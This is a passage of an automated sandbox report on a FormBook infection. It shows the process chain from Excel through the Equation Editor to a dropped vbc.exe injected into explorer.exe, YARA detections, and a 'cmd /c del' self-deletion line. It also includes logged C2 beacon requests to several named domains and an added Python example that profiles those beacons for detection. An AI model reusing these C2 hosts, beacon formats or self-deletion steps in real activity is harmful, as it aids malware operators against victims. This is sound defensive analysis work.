                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:15.480021954 CEST606INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
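The nine sessions above are all the same beacon with a different Host header: the path /nthe/, the two parameter names and the t48tJ value never change, while Host and 5jo4nr do, and the client is always C:\Windows\explorer.exe. The following Python is an added example, not code from the sandbox report or from FormBook: it transcribes the sessions above as constructed input, separates the constant part of the request from the variable part, and reuses the constant part as a matcher for new sessions. The profile/matching functions, the explorer.exe client check and the field names (sid, host, dst, proc, status, uri) are this example's own design.

```python
"""Profile the HTTP beacons in the sessions above and reuse the constant part as a
detection.  Added example; not code from the sandbox report or from FormBook."""
from collections import Counter, defaultdict

EXPLORER = r"C:\Windows\explorer.exe"

# Constructed input: Host, request URI, client process, destination IP and HTTP
# status of the nine sessions transcribed from the report above.  Every request
# also sent "Connection: close" and a 7-byte all-null body (Data Raw: 00 x7).
SESSIONS = [
    dict(sid=17, host="www.realstyleworks.com", dst="34.98.99.30", proc=EXPLORER, status=403,
         uri="/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ=="),
    dict(sid=2, host="www.plasticplank.com", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P"),
    dict(sid=3, host="www.realstyleworks.com", dst="34.98.99.30", proc=EXPLORER, status=403,
         uri="/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ=="),
    dict(sid=4, host="www.authorjameswshepherdonline.com", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA=="),
    dict(sid=5, host="www.hanlansmojitovillage.net", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ=="),
    dict(sid=6, host="www.thaysay.net", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P"),
    dict(sid=7, host="www.onpar-golf.com", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P"),
    dict(sid=8, host="www.americanstonesusa.com", dst="192.99.131.252", proc=EXPLORER, status=301,
         uri="/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ=="),
    dict(sid=9, host="www.plasticplank.com", dst="34.102.136.180", proc=EXPLORER, status=403,
         uri="/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P"),
]


def split_uri(uri):
    """Return (path, {param: raw value}).  No percent/plus decoding on purpose: the
    values contain '+' and '/' and must stay byte-for-byte comparable with the capture."""
    path, _, query = uri.partition("?")
    params = {}
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        params[key] = value
    return path, params


def beacon_profile(sessions):
    """What stays constant across sessions is the signature; the hosts are noise."""
    paths = Counter()
    values = defaultdict(Counter)          # param name -> Counter of raw values
    hosts, procs, statuses = set(), set(), Counter()
    for s in sessions:
        path, params = split_uri(s["uri"])
        paths[path] += 1
        for k, v in params.items():
            values[k][v] += 1
        hosts.add(s["host"])
        procs.add(s["proc"])
        statuses[s["status"]] += 1
    constant = {k: next(iter(c)) for k, c in values.items() if len(c) == 1}
    return {
        "path": paths.most_common(1)[0][0],
        "param_names": sorted(values),
        "constant_params": constant,
        "hosts": sorted(hosts),
        "processes": sorted(procs),
        "statuses": dict(statuses),
    }


def host_bound_values(sessions, param):
    """Map each Host to the distinct raw values it received for `param`."""
    seen = defaultdict(set)
    for s in sessions:
        _, params = split_uri(s["uri"])
        if param in params:
            seen[s["host"]].add(params[param])
    return {h: sorted(v) for h, v in seen.items()}


def matches_profile(session, profile):
    """True when a session reproduces the observed beacon: same path, same parameter
    set in any order, every constant value present, and explorer.exe as the client."""
    path, params = split_uri(session["uri"])
    return (path == profile["path"]
            and set(params) == set(profile["param_names"])
            and all(params.get(k) == v for k, v in profile["constant_params"].items())
            and session["proc"].lower().endswith("\\explorer.exe"))


if __name__ == "__main__":
    prof = beacon_profile(SESSIONS)
    print("path:", prof["path"], "constant params:", prof["constant_params"])
    print("hosts contacted:", len(prof["hosts"]), "statuses:", prof["statuses"])
    for host, vals in host_bound_values(SESSIONS, "5jo4nr").items():
        print(f"{host}: {len(vals)} distinct 5jo4nr value(s)")
```

Two things the parsed view shows that a substring match on the URI would not: the parameter order flips between requests (t48tJ first in sessions 17, 3, 4, 5 and 8, 5jo4nr first in the others), so the matcher compares the parameter set rather than the string; and each Host received exactly one 5jo4nr value across the run (plasticplank.com and realstyleworks.com were each contacted twice with the same value), so Host plus 5jo4nr pairs are stable indicators for this sample. The 403 and 301 responses only say that nothing was served during the analysis; they do not tell which of the seven hosts, if any, is the live C2 rather than a decoy.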


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior


                                                                                      System Behavior

                                                                                      General

                                                                                      Start time: 11:15:22
                                                                                      Start date: 15/09/2021
                                                                                      Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit): false
                                                                                      Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase: 0x13fa90000
                                                                                      File size: 28253536 bytes
                                                                                      MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Reputation: moderate

General

Start time: 11:15:45
Start date: 15/09/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:15:48
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 11:15:51
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): false
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:15:52
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x200000
File size: 556544 bytes
MD5 hash: 989933E361010648C467C6D7B6C2D812
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:15:54
Start date: 15/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffa10000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 11:16:21
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0x2f0000
File size: 27136 bytes
MD5 hash: CABB20E171770FF64614A54C1F31C033
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:16:22
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4acd0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis